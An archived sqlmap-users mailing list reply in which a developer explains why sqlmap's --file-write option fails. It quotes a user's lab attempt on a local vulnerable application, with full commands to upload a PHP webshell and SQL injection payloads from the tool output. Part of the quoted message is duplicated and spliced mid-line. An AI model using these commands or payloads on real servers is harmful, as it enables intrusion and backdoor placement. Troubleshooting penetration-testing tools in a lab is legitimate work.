Re: [sqlmap-users] File Write Error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] File Write Error
|
From: Miroslav S. <mir...@gm...> - 2014-03-21 09:42:33
|
Hi. --file-write requires union or stacked techniques to be available. In case of --os-shell we also use INTO OUTFILE technique which is pretty dirty (in most of cases you can expect original results appearing in the first couple of lines). Option --file-write in our case should produce a "clean" file Kind regards, Miroslav Stampar On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hu...> wrote: > Hello Everyone, > > I'm attempting to use sqlmap to exploit a local installation of some > software. I know it's vulnerable because it's on exploit-db & metasploit > pops it every time (http://www.exploit-db.com/exploits/20501/). I've had > limited success with sqlmap, but I'm at the final stage now where I'm > trying to use the sqli's I've found to upload a webshell via sqlmap. No > dice....I'm getting an error stating "[ERROR] none of the SQL injection > techniques detected can be used to write files to the underlying file > system of the back-end MySQL server." Other than the obvious, I'm not sure > what this means because --os-shell and --os-cmd upload a file and execute > just fine. Does --file-write need something special? Here's the output: > > root@kali:/usr/share/sqlmap# sqlmap -u " > http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" > -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php -v3 > > ... > [*] starting at 23:13:08 > > [23:13:08] [DEBUG] cleaning up configuration parameters > [23:13:08] [DEBUG] setting the HTTP timeout > [23:13:08] [DEBUG] setting the HTTP method to GET > [23:13:08] [DEBUG] creating HTTP requests opener object > [23:13:08] [DEBUG] forcing back-end DBMS to user defined value > [23:13:08] [DEBUG] setting the write file functionality > [23:13:08] [INFO] testing connection to the target URL > [23:13:08] [DEBUG] declared web page charset 'utf-8' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: username > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND > 'yVaP'='yVaP&password=admin > Vector: AND [INFERENCE] > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND > 'OHln'='OHln&password=admin > Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) > --- > [23:13:08] [INFO] testing MySQL > [23:13:08] [INFO] confirming MySQL > [23:13:08] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.1, Apache 2.2.14 > back-end DBMS: MySQL >= 5.0.0 > [23:13:08] [INFO] fingerprinting the back-end DBMS operating system > [23:13:08] [INFO] the back-end DBMS operating system is Windows > [23:13:08] [ERROR] none of the SQL injection techniques detected can be > used to write files to the underlying file system of the back-end MySQL > server > [23:13:08] [INFO] fetched data logged to text files under > '/usr/share/sqlmap/output/172.16.71.138' > > [*] shutting down at 23:13:08 > > > The results are the same when the cmdline is changed up for a POST version: > > root@kali:/usr/share/sqlm > Hello Everyone, > > I'm attempting to use sqlmap to exploit a local installation of some > software. I know it's vulnerable because it's on exploit-db & metasploit > pops it every time (http://www.exploit-db.com/exploits/20501/). I've had > limited success with sqlmap, but I'm at the final stage now where I'm > trying to use the sqli's I've found to upload a webshell via sqlmap. No > dice....I'm getting an error stating "[ERROR] none of the SQL injection > techniques detected can be used to write files to the underlying file > system of the back-end MySQL server." Other than the obvious, I'm not sure > what this means because --os-shell and --os-cmd upload a file and execute > just fine. Does --file-write need something special? Here's the output: > > root@kali:/usr/share/sqlmap# sqlmap -u " > http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin" > -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php -v3 > > ... > [*] starting at 23:13:08 > > [23:13:08] [DEBUG] cleaning up configuration parameters > [23:13:08] [DEBUG] setting the HTTP timeout > [23:13:08] [DEBUG] setting the HTTP method to GET > [23:13:08] [DEBUG] creating HTTP requests opener object > [23:13:08] [DEBUG] forcing back-end DBMS to user defined value > [23:13:08] [DEBUG] setting the write file functionality > [23:13:08] [INFO] testing connection to the target URL > [23:13:08] [DEBUG] declared web page charset 'utf-8' > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: username > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND > 'yVaP'='yVaP&password=admin > Vector: AND [INFERENCE] > > Type: AND/OR time-based blind > Title: MySQL > 5.0.11 AND time-based blind > Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND > 'OHln'='OHln&password=admin > Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) > --- > [23:13:08] [INFO] testing MySQL > [23:13:08] [INFO] confirming MySQL > [23:13:08] [INFO] the back-end DBMS is MySQL > web server operating system: Windows > web application technology: PHP 5.3.1, Apache 2.2.14 > back-end DBMS: MySQL >= 5.0.0 > [23:13:08] [INFO] fingerprinting the back-end DBMS operating system > [23:13:08] [INFO] the back-end DBMS operating system is Windows > [23:13:08] [ERROR] none of the SQL injection techniques detected can be > used to write files to the underlying file system of the back-end MySQL > server > [23:13:08] [INFO] fetched data logged to text files under > '/usr/share/sqlmap/output/172.16.71.138' > > [*] shutting down at 23:13:08 > > > The results are the same when the cmdline is changed up for a POST version: > > root@kali:/usr/share/sqlmap# sqlmap -u " > http://172.16.71.138:7879/index.php" > --data='act=auth-login&pag=login&username=admin&password=admin' -p > "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php -v3 > > Any thoughts on what may be happening here would be much appreciated. > > Thanks, > > Brian > ap# sqlmap -u "http://172.16.71.138:7879/index.php" > --data='act=auth-login&pag=login&username=admin&password=admin' -p > "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write > /usr/share/webshells/php/simple-backdoor.php --file-dest > progra~1/cyclope/ni4zlja=/backdoor.php -v3 > > Any thoughts on what may be happening here would be much appreciated. > > Thanks, > > Brian > > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
